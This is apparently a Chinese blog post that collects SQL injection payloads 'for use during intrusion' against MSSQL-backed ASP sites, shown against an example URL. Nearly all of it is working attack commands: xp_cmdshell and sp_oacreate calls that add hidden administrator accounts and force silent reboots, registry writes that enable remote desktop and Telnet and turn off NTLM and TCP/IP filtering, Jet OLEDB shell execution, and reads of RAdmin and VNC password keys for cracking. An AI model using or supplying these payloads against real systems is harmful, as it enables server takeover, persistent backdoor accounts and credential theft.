总结的几个入侵时可能用到的SQL语句
总结的几个入侵时可能用到的SQL语句
http://192.168.200.188/product_list.asp?classid=14;
exec master..xp_cmdshell 'iisreset /reboot /timeout:00';-- // 重启机器无提示
exec master..xp_cmdshell 'net user hi$ 123 /add';-- //添加hi$用户
exec master..xp_cmdshell 'net localgroup administrators hi$ /add';-- //提升权限
http://192.168.200.188/product_list.asp?classid=14;
exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\TermService','Start','REG_DWord',2;-- // 把终端服务设为自动,4为禁用,2为自动
http://192.168.200.188/product_list.asp?classid=14
;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;-- // 开启远程桌面
http://192.168.200.188/product_list.asp?classid=14
declare @cmd INT exec sp_oacreate 'wscript.shell',@cmd output exec sp_oamethod @cmd,'run',null,'iisreset /reboot /timeout:00','0','true' // 直接重启无提示
http://192.168.200.188/product_list.asp?classid=14
;exec sp_addlogin BUILUET_Administrators;exec sp_addsrvrolemember BUILUET_Administrators,sysadmin;-- //加为系统级帐户
http://192.168.200.188/product_list.asp?classid=14
;exec sp_droplogin BUILUET_Administrators;-- // 删除用户
exec sp_password null,xxxxx,'BUILUET_Administrators'
// 将BUILUET_Administrators空密码设为密码xxxxx
exec master.dbo.xp_cmdshell 'net user ASPNET_v2.0 111111 /ad';--
exec master.dbo.xp_cmdshell 'net localgroup administrators ASPNET_v2.0 /ad';--
exec master..xp_fixeddrives
//列出硬盘
http://192.168.200.188/product_list.asp?classid=14
declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE' exec master..xp_regwrite @r,'SYSTEM\currentControlSet\Services\Tcpip\Parameters\','EnableSecurityFilters','REG_DWORD',0 exec master..xp_regwrite @r,'SYSTEM\ControlSet001\Services\Tcpip\Parameters\','EnableSecurityFilters','REG_DWORD',0 exec master..xp_cmdshell 'iisreset /reboot /timeout:00';-- //禁止TCP,IP筛选
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\TlntSvr','Start','REG_DWord',2;-- //开户Telnet
exec master.dbo.xp_cmdshell 'net start TlntSvr'
那就是直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user daxia$ sdfdssdf /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators daxia$ /add")')
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\
Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' 读终端端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
读radmin密码
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\RealVNC\WinVNC4','password'
读vnc密码,然后破解
由于存在安全隐患,所以在SQL Server中, xp_cmdshell 默认是关闭的。
exec sp_configure 'show advanced options',1
reconfigure
go
exec sp_configure 'xp_cmdshell',0
reconfigure
go
开启
exec sp_configure 'show advanced options',1
reconfigure
go
exec sp_configure 'xp_cmdshell',1
reconfigure
go
exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ad Hoc Distributed Queries',1
reconfigure
go
- 上一篇:华为AR路由器端口映射 2022/1/30
- 下一篇:尝试在数据库 9 中提取逻辑页 (1:7105) 失败。该逻 2022/1/30